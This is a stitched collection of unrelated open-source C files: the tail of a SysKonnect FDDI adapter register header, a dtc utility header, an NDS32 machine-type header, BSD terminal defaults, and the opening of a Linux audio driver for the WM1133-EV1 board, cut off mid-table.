/* Bit 2: Clear IRQ SW Request */ #define CTRL_STOP_DONE (1<<1) /* Bit 1: Stop Master is finished */ #define CTRL_STOP_MAST (1<<0) /* Bit 0: Command Bit to stop the master*/ /* B2_IFACE_REG 0x0155 (ML) 8 bit Interface Register */ /* Bit 7..3: reserved */ #define IF_I2C_DATA_DIR (1<<2) /* Bit 2: direction of IF_I2C_DATA*/ #define IF_I2C_DATA (1<<1) /* Bit 1: I2C Data Port */ #define IF_I2C_CLK (1<<0) /* Bit 0: I2C Clock Port */ /* 0x0156: reserved */ /* B2_TST_CTRL_2 0x0157 (ML) 8 bit Test Control Register 2 */ /* Bit 7..4: reserved */ /* force the following error on */ /* the next master read/write */ #define TST_FRC_DPERR_MR64 (1<<3) /* Bit 3: DataPERR RD 64 */ #define TST_FRC_DPERR_MW64 (1<<2) /* Bit 2: DataPERR WR 64 */ #define TST_FRC_APERR_1M64 (1<<1) /* Bit 1: AddrPERR on 1. phase */ #define TST_FRC_APERR_2M64 (1<<0) /* Bit 0: AddrPERR on 2. phase */ /* B2_I2C_CTRL 0x0158 (ML) 32 bit I2C Control Register */ #define I2C_FLAG (1L<<31) /* Bit 31: Start read/write if WR */ #define I2C_ADDR (0x7fffL<<16) /* Bit 30..16: Addr to be read/written*/ #define I2C_DEV_SEL (0x7fL<<9) /* Bit 9..15: I2C Device Select */ /* Bit 5.. 8: reserved */ #define I2C_BURST_LEN (1L<<4) /* Bit 4 Burst Len, 1/4 bytes */ #define I2C_DEV_SIZE (7L<<1) /* Bit 1.. 3: I2C Device Size */ #define I2C_025K_DEV (0L<<1) /* 0: 256 Bytes or smaller*/ #define I2C_05K_DEV (1L<<1) /* 1: 512 Bytes */ #define I2C_1K_DEV (2L<<1) /* 2: 1024 Bytes */ #define I2C_2K_DEV (3L<<1) /* 3: 2048 Bytes */ #define I2C_4K_DEV (4L<<1) /* 4: 4096 Bytes */ #define I2C_8K_DEV (5L<<1) /* 5: 8192 Bytes */ #define I2C_16K_DEV (6L<<1) /* 6: 16384 Bytes */ #define I2C_32K_DEV (7L<<1) /* 7: 32768 Bytes */ #define I2C_STOP_BIT (1<<0) /* Bit 0: Interrupt I2C transfer */ /* * I2C Addresses * * The temperature sensor and the voltage sensor are on the same I2C bus. * Note: The voltage sensor (Micorwire) will be selected by PCI_EXT_PATCH_1 * in PCI_OUR_REG 1. */ #define I2C_ADDR_TEMP 0x90 /* I2C Address Temperature Sensor */ /* B2_I2C_DATA 0x015c (ML) 32 bit I2C Data Register */ /* B4_R1_D 4*32 bit current receive Descriptor (q1) */ /* B4_R1_DA 32 bit current rec desc address (q1) */ /* B4_R1_AC 32 bit current receive Address Count (q1) */ /* B4_R1_BC 32 bit current receive Byte Counter (q1) */ /* B4_R1_CSR 32 bit BMU Control/Status Register (q1) */ /* B4_R1_F 32 bit flag register (q1) */ /* B4_R1_T1 32 bit Test Register 1 (q1) */ /* B4_R1_T2 32 bit Test Register 2 (q1) */ /* B4_R1_T3 32 bit Test Register 3 (q1) */ /* B4_R2_D 4*32 bit current receive Descriptor (q2) */ /* B4_R2_DA 32 bit current rec desc address (q2) */ /* B4_R2_AC 32 bit current receive Address Count (q2) */ /* B4_R2_BC 32 bit current receive Byte Counter (q2) */ /* B4_R2_CSR 32 bit BMU Control/Status Register (q2) */ /* B4_R2_F 32 bit flag register (q2) */ /* B4_R2_T1 32 bit Test Register 1 (q2) */ /* B4_R2_T2 32 bit Test Register 2 (q2) */ /* B4_R2_T3 32 bit Test Register 3 (q2) */ /* B5_XA_D 4*32 bit current receive Descriptor (xa) */ /* B5_XA_DA 32 bit current rec desc address (xa) */ /* B5_XA_AC 32 bit current receive Address Count (xa) */ /* B5_XA_BC 32 bit current receive Byte Counter (xa) */ /* B5_XA_CSR 32 bit BMU Control/Status Register (xa) */ /* B5_XA_F 32 bit flag register (xa) */ /* B5_XA_T1 32 bit Test Register 1 (xa) */ /* B5_XA_T2 32 bit Test Register 2 (xa) */ /* B5_XA_T3 32 bit Test Register 3 (xa) */ /* B5_XS_D 4*32 bit current receive Descriptor (xs) */ /* B5_XS_DA 32 bit current rec desc address (xs) */ /* B5_XS_AC 32 bit current receive Address Count (xs) */ /* B5_XS_BC 32 bit current receive Byte Counter (xs) */ /* B5_XS_CSR 32 bit BMU Control/Status Register (xs) */ /* B5_XS_F 32 bit flag register (xs) */ /* B5_XS_T1 32 bit Test Register 1 (xs) */ /* B5_XS_T2 32 bit Test Register 2 (xs) */ /* B5_XS_T3 32 bit Test Register 3 (xs) */ /* B5_<xx>_CSR 32 bit BMU Control/Status Register (xx) */ #define CSR_DESC_CLEAR (1L<<21) /* Bit 21: Clear Reset for Descr */ #define CSR_DESC_SET (1L<<20) /* Bit 20: Set Reset for Descr */ #define CSR_FIFO_CLEAR (1L<<19) /* Bit 19: Clear Reset for FIFO */ #define CSR_FIFO_SET (1L<<18) /* Bit 18: Set Reset for FIFO */ #define CSR_HPI_RUN (1L<<17) /* Bit 17: Release HPI SM */ #define CSR_HPI_RST (1L<<16) /* Bit 16: Reset HPI SM to Idle */ #define CSR_SV_RUN (1L<<15) /* Bit 15: Release Supervisor SM */ #define CSR_SV_RST (1L<<14) /* Bit 14: Reset Supervisor SM */ #define CSR_DREAD_RUN (1L<<13) /* Bit 13: Release Descr Read SM */ #define CSR_DREAD_RST (1L<<12) /* Bit 12: Reset Descr Read SM */ #define CSR_DWRITE_RUN (1L<<11) /* Bit 11: Rel. Descr Write SM */ #define CSR_DWRITE_RST (1L<<10) /* Bit 10: Reset Descr Write SM */ #define CSR_TRANS_RUN (1L<<9) /* Bit 9: Release Transfer SM */ #define CSR_TRANS_RST (1L<<8) /* Bit 8: Reset Transfer SM */ /* Bit 7..5: reserved */ #define CSR_START (1L<<4) /* Bit 4: Start Rec/Xmit Queue */ #define CSR_IRQ_CL_P (1L<<3) /* Bit 3: Clear Parity IRQ, Rcv */ #define CSR_IRQ_CL_B (1L<<2) /* Bit 2: Clear EOB IRQ */ #define CSR_IRQ_CL_F (1L<<1) /* Bit 1: Clear EOF IRQ */ #define CSR_IRQ_CL_C (1L<<0) /* Bit 0: Clear ERR IRQ */ #define CSR_SET_RESET (CSR_DESC_SET|CSR_FIFO_SET|CSR_HPI_RST|CSR_SV_RST|\ CSR_DREAD_RST|CSR_DWRITE_RST|CSR_TRANS_RST) #define CSR_CLR_RESET (CSR_DESC_CLEAR|CSR_FIFO_CLEAR|CSR_HPI_RUN|CSR_SV_RUN|\ CSR_DREAD_RUN|CSR_DWRITE_RUN|CSR_TRANS_RUN) /* B5_<xx>_F 32 bit flag register (xx) */ /* Bit 28..31: reserved */ #define F_ALM_FULL (1L<<27) /* Bit 27: (ML) FIFO almost full */ #define F_FIFO_EOF (1L<<26) /* Bit 26: (ML) Fag bit in FIFO */ #define F_WM_REACHED (1L<<25) /* Bit 25: (ML) Watermark reached */ #define F_UP_DW_USED (1L<<24) /* Bit 24: (ML) Upper Dword used (bug)*/ /* Bit 23: reserved */ #define F_FIFO_LEVEL (0x1fL<<16) /* Bit 16..22:(ML) # of Qwords in FIFO*/ /* Bit 8..15: reserved */ #define F_ML_WATER_M 0x0000ffL /* Bit 0.. 7:(ML) Watermark */ #define FLAG_WATER 0x00001fL /* Bit 4..0:(DV) Level of req data tr.*/ /* B5_<xx>_T1 32 bit Test Register 1 (xx) */ /* Holds four State Machine control Bytes */ #define SM_CRTL_SV (0xffL<<24) /* Bit 31..24: Control Supervisor SM */ #define SM_CRTL_RD (0xffL<<16) /* Bit 23..16: Control Read Desc SM */ #define SM_CRTL_WR (0xffL<<8) /* Bit 15..8: Control Write Desc SM */ #define SM_CRTL_TR (0xffL<<0) /* Bit 7..0: Control Transfer SM */ /* B4_<xx>_T1_TR 8 bit Test Register 1 TR (xx) */ /* B4_<xx>_T1_WR 8 bit Test Register 1 WR (xx) */ /* B4_<xx>_T1_RD 8 bit Test Register 1 RD (xx) */ /* B4_<xx>_T1_SV 8 bit Test Register 1 SV (xx) */ /* The control status byte of each machine looks like ... */ #define SM_STATE 0xf0 /* Bit 7..4: State which shall be loaded */ #define SM_LOAD 0x08 /* Bit 3: Load the SM with SM_STATE */ #define SM_TEST_ON 0x04 /* Bit 2: Switch on SM Test Mode */ #define SM_TEST_OFF 0x02 /* Bit 1: Go off the Test Mode */ #define SM_STEP 0x01 /* Bit 0: Step the State Machine */ /* The coding of the states */ #define SM_SV_IDLE 0x0 /* Supervisor Idle Tr/Re */ #define SM_SV_RES_START 0x1 /* Supervisor Res_Start Tr/Re */ #define SM_SV_GET_DESC 0x3 /* Supervisor Get_Desc Tr/Re */ #define SM_SV_CHECK 0x2 /* Supervisor Check Tr/Re */ #define SM_SV_MOV_DATA 0x6 /* Supervisor Move_Data Tr/Re */ #define SM_SV_PUT_DESC 0x7 /* Supervisor Put_Desc Tr/Re */ #define SM_SV_SET_IRQ 0x5 /* Supervisor Set_Irq Tr/Re */ #define SM_RD_IDLE 0x0 /* Read Desc. Idle Tr/Re */ #define SM_RD_LOAD 0x1 /* Read Desc. Load Tr/Re */ #define SM_RD_WAIT_TC 0x3 /* Read Desc. Wait_TC Tr/Re */ #define SM_RD_RST_EOF 0x6 /* Read Desc. Reset_EOF Re */ #define SM_RD_WDONE_R 0x2 /* Read Desc. Wait_Done Re */ #define SM_RD_WDONE_T 0x4 /* Read Desc. Wait_Done Tr */ #define SM_TR_IDLE 0x0 /* Trans. Data Idle Tr/Re */ #define SM_TR_LOAD 0x3 /* Trans. Data Load Tr/Re */ #define SM_TR_LOAD_R_ML 0x1 /* Trans. Data Load /Re (ML) */ #define SM_TR_WAIT_TC 0x2 /* Trans. Data Wait_TC Tr/Re */ #define SM_TR_WDONE 0x4 /* Trans. Data Wait_Done Tr/Re */ #define SM_WR_IDLE 0x0 /* Write Desc. Idle Tr/Re */ #define SM_WR_ABLEN 0x1 /* Write Desc. Act_Buf_Length Tr/Re */ #define SM_WR_LD_A4 0x2 /* Write Desc. Load_A4 Re */ #define SM_WR_RES_OWN 0x2 /* Write Desc. Res_OWN Tr */ #define SM_WR_WAIT_EOF 0x3 /* Write Desc. Wait_EOF Re */ #define SM_WR_LD_N2C_R 0x4 /* Write Desc. Load_N2C Re */ #define SM_WR_WAIT_TC_R 0x5 /* Write Desc. Wait_TC Re */ #define SM_WR_WAIT_TC4 0x6 /* Write Desc. Wait_TC4 Re */ #define SM_WR_LD_A_T 0x6 /* Write Desc. Load_A Tr */ #define SM_WR_LD_A_R 0x7 /* Write Desc. Load_A Re */ #define SM_WR_WAIT_TC_T 0x7 /* Write Desc. Wait_TC Tr */ #define SM_WR_LD_N2C_T 0xc /* Write Desc. Load_N2C Tr */ #define SM_WR_WDONE_T 0x9 /* Write Desc. Wait_Done Tr */ #define SM_WR_WDONE_R 0xc /* Write Desc. Wait_Done Re */ #define SM_WR_LD_D_AD 0xe /* Write Desc. Load_Dumr_A Re (ML) */ #define SM_WR_WAIT_D_TC 0xf /* Write Desc. Wait_Dumr_TC Re (ML) */ /* B5_<xx>_T2 32 bit Test Register 2 (xx) */ /* Note: This register is only defined for the transmit queues */ /* Bit 31..8: reserved */ #define AC_TEST_ON (1<<7) /* Bit 7: Address Counter Test Mode on */ #define AC_TEST_OFF (1<<6) /* Bit 6: Address Counter Test Mode off*/ #define BC_TEST_ON (1<<5) /* Bit 5: Byte Counter Test Mode on */ #define BC_TEST_OFF (1<<4) /* Bit 4: Byte Counter Test Mode off */ #define TEST_STEP04 (1<<3) /* Bit 3: Inc AC/Dec BC by 4 */ #define TEST_STEP03 (1<<2) /* Bit 2: Inc AC/Dec BC by 3 */ #define TEST_STEP02 (1<<1) /* Bit 1: Inc AC/Dec BC by 2 */ #define TEST_STEP01 (1<<0) /* Bit 0: Inc AC/Dec BC by 1 */ /* B5_<xx>_T3 32 bit Test Register 3 (xx) */ /* Note: This register is only defined for the transmit queues */ /* Bit 31..8: reserved */ #define T3_MUX_2 (1<<7) /* Bit 7: (ML) Mux position MSB */ #define T3_VRAM_2 (1<<6) /* Bit 6: (ML) Virtual RAM buffer addr MSB */ #define T3_LOOP (1<<5) /* Bit 5: Set Loopback (Xmit) */ #define T3_UNLOOP (1<<4) /* Bit 4: Unset Loopback (Xmit) */ #define T3_MUX (3<<2) /* Bit 3..2: Mux position */ #define T3_VRAM (3<<0) /* Bit 1..0: Virtual RAM buffer Address */ /* PCI card IDs */ /* * Note: The following 4 byte definitions shall not be used! Use OEM Concept! */ #define PCI_VEND_ID0 0x48 /* PCI vendor ID (SysKonnect) */ #define PCI_VEND_ID1 0x11 /* PCI vendor ID (SysKonnect) */ /* (High byte) */ #define PCI_DEV_ID0 0x00 /* PCI device ID */ #define PCI_DEV_ID1 0x40 /* PCI device ID (High byte) */ /*#define PCI_CLASS 0x02*/ /* PCI class code: network device */ #define PCI_NW_CLASS 0x02 /* PCI class code: network device */ #define PCI_SUB_CLASS 0x02 /* PCI subclass ID: FDDI device */ #define PCI_PROG_INTFC 0x00 /* PCI programming Interface (=0) */ /* * address transmission from logical to physical offset address on board */ #define FMA(a) (0x0400|((a)<<2)) /* FORMAC+ (r/w) (SN3) */ #define P1(a) (0x0380|((a)<<2)) /* PLC1 (r/w) (DAS) */ #define P2(a) (0x0600|((a)<<2)) /* PLC2 (r/w) (covered by the SN3) */ #define PRA(a) (B2_MAC_0 + (a)) /* configuration PROM (MAC address) */ /* * FlashProm specification */ #define MAX_PAGES 0x20000L /* Every byte has a single page */ #define MAX_FADDR 1 /* 1 byte per page */ /* * Receive / Transmit Buffer Control word */ #define BMU_OWN (1UL<<31) /* OWN bit: 0 == host, 1 == adapter */ #define BMU_STF (1L<<30) /* Start of Frame ? */ #define BMU_EOF (1L<<29) /* End of Frame ? */ #define BMU_EN_IRQ_EOB (1L<<28) /* Enable "End of Buffer" IRQ */ #define BMU_EN_IRQ_EOF (1L<<27) /* Enable "End of Frame" IRQ */ #define BMU_DEV_0 (1L<<26) /* RX: don't transfer to system mem */ #define BMU_SMT_TX (1L<<25) /* TX: if set, buffer type SMT_MBuf */ #define BMU_ST_BUF (1L<<25) /* RX: copy of start of frame */ #define BMU_UNUSED (1L<<24) /* Set if the Descr is curr unused */ #define BMU_SW (3L<<24) /* 2 Bits reserved for SW usage */ #define BMU_CHECK 0x00550000L /* To identify the control word */ #define BMU_BBC 0x0000FFFFL /* R/T Buffer Byte Count */ /* * physical address offset + IO-Port base address */ #ifdef MEM_MAPPED_IO #define ADDR(a) (char far *) smc->hw.iop+(a) #define ADDRS(smc,a) (char far *) (smc)->hw.iop+(a) #else #define ADDR(a) (((a)>>7) ? (outp(smc->hw.iop+B0_RAP,(a)>>7), \ (smc->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) : \ (smc->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) #define ADDRS(smc,a) (((a)>>7) ? (outp((smc)->hw.iop+B0_RAP,(a)>>7), \ ((smc)->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) : \ ((smc)->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) #endif /* * Define a macro to access the configuration space */ #define PCI_C(a) ADDR(B3_CFG_SPC + (a)) /* PCI Config Space */ #define EXT_R(a) ADDR(B6_EXT_REG + (a)) /* External Registers */ /* * Define some values needed for the MAC address (PROM) */ #define SA_MAC (0) /* start addr. MAC_AD within the PROM */ #define PRA_OFF (0) /* offset correction when 4th byte reading */ #define SKFDDI_PSZ 8 /* address PROM size */ #define FM_A(a) ADDR(FMA(a)) /* FORMAC Plus physical addr */ #define P1_A(a) ADDR(P1(a)) /* PLC1 (r/w) */ #define P2_A(a) ADDR(P2(a)) /* PLC2 (r/w) (DAS) */ #define PR_A(a) ADDR(PRA(a)) /* config. PROM (MAC address) */ /* * Macro to read the PROM */ #define READ_PROM(a) ((u_char)inp(a)) #define GET_PAGE(bank) outpd(ADDR(B2_FAR),bank) #define VPP_ON() #define VPP_OFF() /* * Note: Values of the Interrupt Source Register are defined above */ #define ISR_A ADDR(B0_ISRC) #define GET_ISR() inpd(ISR_A) #define GET_ISR_SMP(iop) inpd((iop)+B0_ISRC) #define CHECK_ISR() (inpd(ISR_A) & inpd(ADDR(B0_IMSK))) #define CHECK_ISR_SMP(iop) (inpd((iop)+B0_ISRC) & inpd((iop)+B0_IMSK)) #define BUS_CHECK() /* * CLI_FBI: Disable Board Interrupts * STI_FBI: Enable Board Interrupts */ #ifndef UNIX #define CLI_FBI() outpd(ADDR(B0_IMSK),0) #else #define CLI_FBI(smc) outpd(ADDRS((smc),B0_IMSK),0) #endif #ifndef UNIX #define STI_FBI() outpd(ADDR(B0_IMSK),smc->hw.is_imask) #else #define STI_FBI(smc) outpd(ADDRS((smc),B0_IMSK),(smc)->hw.is_imask) #endif #define CLI_FBI_SMP(iop) outpd((iop)+B0_IMSK,0) #define STI_FBI_SMP(smc,iop) outpd((iop)+B0_IMSK,(smc)->hw.is_imask) #endif /* PCI */ /*--------------------------------------------------------------------------*/ /* * 12 bit transfer (dword) counter: * (ISA: 2*trc = number of byte) * (EISA: 4*trc = number of byte) * (MCA: 4*trc = number of byte) */ #define MAX_TRANS (0x0fff) /* * PC PIC */ #define MST_8259 (0x20) #define SLV_8259 (0xA0) #define TPS (18) /* ticks per second */ /* * error timer defs */ #define TN (4) /* number of supported timer = TN+1 */ #define SNPPND_TIME (5) /* buffer memory access over mem. data reg. */ #define MAC_AD 0x405a0000 #define MODR1 FM_A(FM_MDREG1) /* mode register 1 */ #define MODR2 FM_A(FM_MDREG2) /* mode register 2 */ #define CMDR1 FM_A(FM_CMDREG1) /* command register 1 */ #define CMDR2 FM_A(FM_CMDREG2) /* command register 2 */ /* * function defines */ #define CLEAR(io,mask) outpw((io),inpw(io)&(~(mask))) #define SET(io,mask) outpw((io),inpw(io)|(mask)) #define GET(io,mask) (inpw(io)&(mask)) #define SETMASK(io,val,mask) outpw((io),(inpw(io) & ~(mask)) | (val)) /* * PHY Port A (PA) = PLC 1 * With SuperNet 3 PHY-A and PHY S are identical. */ #define PLC(np,reg) (((np) == PA) ? P2_A(reg) : P1_A(reg)) /* * set memory address register for write and read */ #define MARW(ma) outpw(FM_A(FM_MARW),(unsigned int)(ma)) #define MARR(ma) outpw(FM_A(FM_MARR),(unsigned int)(ma)) /* * read/write from/to memory data register */ /* write double word */ #define MDRW(dd) outpw(FM_A(FM_MDRU),(unsigned int)((dd)>>16)) ;\ outpw(FM_A(FM_MDRL),(unsigned int)(dd)) #ifndef WINNT /* read double word */ #define MDRR() (((long)inpw(FM_A(FM_MDRU))<<16) + inpw(FM_A(FM_MDRL))) /* read FORMAC+ 32-bit status register */ #define GET_ST1() (((long)inpw(FM_A(FM_ST1U))<<16) + inpw(FM_A(FM_ST1L))) #define GET_ST2() (((long)inpw(FM_A(FM_ST2U))<<16) + inpw(FM_A(FM_ST2L))) #ifdef SUPERNET_3 #define GET_ST3() (((long)inpw(FM_A(FM_ST3U))<<16) + inpw(FM_A(FM_ST3L))) #endif #else /* read double word */ #define MDRR() inp2w((FM_A(FM_MDRU)),(FM_A(FM_MDRL))) /* read FORMAC+ 32-bit status register */ #define GET_ST1() inp2w((FM_A(FM_ST1U)),(FM_A(FM_ST1L))) #define GET_ST2() inp2w((FM_A(FM_ST2U)),(FM_A(FM_ST2L))) #ifdef SUPERNET_3 #define GET_ST3() inp2w((FM_A(FM_ST3U)),(FM_A(FM_ST3L))) #endif #endif /* Special timer macro for 82c54 */ /* timer access over data bus bit 8..15 */ #define OUT_82c54_TIMER(port,val) outpw(TI_A(port),(val)<<8) #define IN_82c54_TIMER(port) ((inpw(TI_A(port))>>8) & 0xff) #ifdef DEBUG #define DB_MAC(mac,st) {if (debug_mac & 0x1)\ printf("M") ;\ if (debug_mac & 0x2)\ printf("\tMAC %d status 0x%08lx\n",mac,st) ;\ if (debug_mac & 0x4)\ dp_mac(mac,st) ;\ } #define DB_PLC(p,iev) { if (debug_plc & 0x1)\ printf("P") ;\ if (debug_plc & 0x2)\ printf("\tPLC %s Int 0x%04x\n", \ (p == PA) ? "A" : "B", iev) ;\ if (debug_plc & 0x4)\ dp_plc(p,iev) ;\ } #define DB_TIMER() { if (debug_timer & 0x1)\ printf("T") ;\ if (debug_timer & 0x2)\ printf("\tTimer ISR\n") ;\ } #else /* no DEBUG */ #define DB_MAC(mac,st) #define DB_PLC(p,iev) #define DB_TIMER() #endif /* no DEBUG */ #define INC_PTR(sp,cp,ep) if (++cp == ep) cp = sp /* * timer defs */ #define COUNT(t) ((t)<<6) /* counter */ #define RW_OP(o) ((o)<<4) /* read/write operation */ #define TMODE(m) ((m)<<1) /* timer mode */ #endif
{ "language": "C" }
#ifndef _UTIL_H #define _UTIL_H /* * Copyright 2008 Jon Loeliger, Freescale Semiconductor, Inc. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License as * published by the Free Software Foundation; either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * USA */ static inline void __attribute__((noreturn)) die(char * str, ...) { va_list ap; va_start(ap, str); fprintf(stderr, "FATAL ERROR: "); vfprintf(stderr, str, ap); exit(1); } static inline void *xmalloc(size_t len) { void *new = malloc(len); if (!new) die("malloc() failed\n"); return new; } static inline void *xrealloc(void *p, size_t len) { void *new = realloc(p, len); if (!new) die("realloc() failed (len=%d)\n", len); return new; } extern char *xstrdup(const char *s); extern char *join_path(const char *path, const char *name); #endif /* _UTIL_H */
{ "language": "C" }
/* * This was automagically generated from arch/nds/tools/mach-types! * Do NOT edit */ #ifndef __ASM_NDS32_MACH_TYPE_H #define __ASM_NDS32_MACH_TYPE_H #ifndef __ASSEMBLY__ /* The type of machine we're running on */ extern unsigned int __machine_arch_type; #endif /* see arch/arm/kernel/arch.c for a description of these */ #define MACH_TYPE_ADPAG101P 1 #define MACH_TYPE_ADPAE3XX 2 #ifdef CONFIG_ARCH_ADPAG101P # ifdef machine_arch_type # undef machine_arch_type # define machine_arch_type __machine_arch_type # else # define machine_arch_type MACH_TYPE_ADPAG101P # endif # define machine_is_adpag101p() (machine_arch_type == MACH_TYPE_ADPAG101P) #else # define machine_is_adpag101p() (1) #endif #endif /* __ASM_NDS32_MACH_TYPE_H */
{ "language": "C" }
/* * Copyright (c) 2000-2002 Apple Computer, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ /* Copyright (c) 1997 Apple Computer, Inc. All Rights Reserved */ /*- * Copyright (c) 1982, 1986, 1993 * The Regents of the University of California. All rights reserved. * (c) UNIX System Laboratories, Inc. * All or some portions of this file are derived from material licensed * to the University of California by American Telephone and Telegraph * Co. or Unix System Laboratories, Inc. and are reproduced herein with * the permission of UNIX System Laboratories, Inc. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)ttydefaults.h 8.4 (Berkeley) 1/21/94 */ /* * System wide defaults for terminal state. */ #ifndef _SYS_TTYDEFAULTS_H_ #define _SYS_TTYDEFAULTS_H_ /* * Defaults on "first" open. */ #define TTYDEF_IFLAG (BRKINT | ICRNL | IMAXBEL | IXON | IXANY) #define TTYDEF_OFLAG (OPOST | ONLCR) #define TTYDEF_LFLAG (ECHO | ICANON | ISIG | IEXTEN | ECHOE|ECHOKE|ECHOCTL) #define TTYDEF_CFLAG (CREAD | CS8 | HUPCL) #define TTYDEF_SPEED (B9600) /* * Control Character Defaults */ #define CTRL(x) (x&037) #define CEOF CTRL('d') #define CEOL 0xff /* XXX avoid _POSIX_VDISABLE */ #define CERASE 0177 #define CINTR CTRL('c') #define CSTATUS CTRL('t') #define CKILL CTRL('u') #define CMIN 1 #define CQUIT 034 /* FS, ^\ */ #define CSUSP CTRL('z') #define CTIME 0 #define CDSUSP CTRL('y') #define CSTART CTRL('q') #define CSTOP CTRL('s') #define CLNEXT CTRL('v') #define CDISCARD CTRL('o') #define CWERASE CTRL('w') #define CREPRINT CTRL('r') #define CEOT CEOF /* compat */ #define CBRK CEOL #define CRPRNT CREPRINT #define CFLUSH CDISCARD /* PROTECTED INCLUSION ENDS HERE */ #endif /* !_SYS_TTYDEFAULTS_H_ */ /* * #define TTYDEFCHARS to include an array of default control characters. */ #ifdef TTYDEFCHARS static cc_t ttydefchars[NCCS] = { CEOF, CEOL, CEOL, CERASE, CWERASE, CKILL, CREPRINT, _POSIX_VDISABLE, CINTR, CQUIT, CSUSP, CDSUSP, CSTART, CSTOP, CLNEXT, CDISCARD, CMIN, CTIME, CSTATUS, _POSIX_VDISABLE }; #undef TTYDEFCHARS #endif
{ "language": "C" }
/* * wm1133-ev1.c - Audio for WM1133-EV1 on i.MX31ADS * * Copyright (c) 2010 Wolfson Microelectronics plc * Author: Mark Brown <broonie@opensource.wolfsonmicro.com> * * Based on an earlier driver for the same hardware by Liam Girdwood. * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. */ #include <linux/platform_device.h> #include <linux/clk.h> #include <sound/core.h> #include <sound/jack.h> #include <sound/pcm.h> #include <sound/pcm_params.h> #include <sound/soc.h> #include <sound/soc-dapm.h> #include <mach/audmux.h> #include "imx-ssi.h" #include "../codecs/wm8350.h" /* There is a silicon mic on the board optionally connected via a solder pad * SP1. Define this to enable it. */ #undef USE_SIMIC struct _wm8350_audio { unsigned int channels; snd_pcm_format_t format; unsigned int rate; unsigned int sysclk; unsigned int bclkdiv; unsigned int clkdiv; unsigned int lr_rate; }; /* in order of power consumption per rate (lowest first) */ static const struct _wm8350_audio wm8350_audio[] = { /* 16bit mono modes */ {1, SNDRV_PCM_FORMAT_S16_LE, 8000, 12288000 >> 1, WM8350_BCLK_DIV_48, WM8350_DACDIV_3, 16,}, /* 16 bit stereo modes */ {2, SNDRV_PCM_FORMAT_S16_LE, 8000, 12288000, WM8350_BCLK_DIV_48, WM8350_DACDIV_6, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 16000, 12288000, WM8350_BCLK_DIV_24, WM8350_DACDIV_3, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 32000, 12288000, WM8350_BCLK_DIV_12, WM8350_DACDIV_1_5, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 48000, 12288000, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 96000, 24576000, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 11025, 11289600, WM8350_BCLK_DIV_32, WM8350_DACDIV_4, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 22050, 11289600, WM8350_BCLK_DIV_16, WM8350_DACDIV_2, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 44100, 11289600, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,}, {2, SNDRV_PCM_FORMAT_S16_LE, 88200, 22579200, WM8350_BCLK_DIV_8, WM8350_DACDIV_1, 32,}, /* 24bit stereo modes */ {2, SNDRV_PCM_FORMAT_S24_LE, 48000, 12288000, 